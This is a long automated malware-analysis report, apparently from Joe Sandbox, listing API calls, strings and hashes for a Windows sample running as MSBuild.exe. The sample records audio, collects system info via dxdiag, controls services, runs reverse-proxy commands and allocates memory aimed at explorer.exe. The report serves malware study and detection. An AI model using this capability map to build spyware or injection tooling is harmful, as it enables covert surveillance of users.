                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                    • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                    • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                                                                                    • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 65535$udp
                                                                                                                                                                                    • API String ID: 0-1267037602
                                                                                                                                                                                    • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                    • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                                                                    • _free.LIBCMT ref: 0043946A
                                                                                                                                                                                    • _free.LIBCMT ref: 00439471
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2441525078-0
                                                                                                                                                                                    • Opcode ID: 606ddd364ea4794747a757fd1bf022872f9487ebb17831d7d7ed170e6e0a9866
                                                                                                                                                                                    • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                                                                    • Opcode Fuzzy Hash: 606ddd364ea4794747a757fd1bf022872f9487ebb17831d7d7ed170e6e0a9866
                                                                                                                                                                                    • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                                                                                    • Opcode ID: 9e2278cc0cffb149c7d28a5598ebb11bef12f38935167312f76522fba682e4d8
                                                                                                                                                                                    • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2278cc0cffb149c7d28a5598ebb11bef12f38935167312f76522fba682e4d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                    • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                                                    • API String ID: 1107811701-2245803885
                                                                                                                                                                                    • Opcode ID: 72b6f248338ad01abce2a85042f135eebbc81b4a8627105bc11ff778a7ce6486
                                                                                                                                                                                    • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72b6f248338ad01abce2a85042f135eebbc81b4a8627105bc11ff778a7ce6486
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                                                                    • API String ID: 2050909247-4145329354
                                                                                                                                                                                    • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                                                    • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                                    • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                                                                    • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                    • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                    • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                    • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                    • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 00446DDF
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    • _free.LIBCMT ref: 00446DEB
                                                                                                                                                                                    • _free.LIBCMT ref: 00446DF6
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E01
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E0C
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E17
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E22
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E2D
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E38
                                                                                                                                                                                    • _free.LIBCMT ref: 00446E46
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                    • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                    • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Eventinet_ntoa
                                                                                                                                                                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                    • API String ID: 3578746661-4192532303
                                                                                                                                                                                    • Opcode ID: b65ca3a684bf95aeda16dd6f7c47a533e9e957861bcc8e12b755de69c336f422
                                                                                                                                                                                    • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                                                                                    • Opcode Fuzzy Hash: b65ca3a684bf95aeda16dd6f7c47a533e9e957861bcc8e12b755de69c336f422
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                    • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                                                                                    • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                      • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                    • API String ID: 1462127192-2001430897
                                                                                                                                                                                    • Opcode ID: 17781720042e8dd5f6383a37f316ae78f39f246e06b2fe8c00021d6916931921
                                                                                                                                                                                    • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17781720042e8dd5f6383a37f316ae78f39f246e06b2fe8c00021d6916931921
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                      • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                    • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                    • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                    • API String ID: 3809562944-3643129801
                                                                                                                                                                                    • Opcode ID: 6ae21cb00cef94fe011206d91043368fb3a1eea725e775b212b5f58a868d8104
                                                                                                                                                                                    • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ae21cb00cef94fe011206d91043368fb3a1eea725e775b212b5f58a868d8104
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                    • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                    • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                    • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                    • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                    • String ID: XCG$`=G$x=G
                                                                                                                                                                                    • API String ID: 1356121797-903574159
                                                                                                                                                                                    • Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                                                                                    • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
                                                                                                                                                                                    • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                                                                                      • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                      • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                      • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
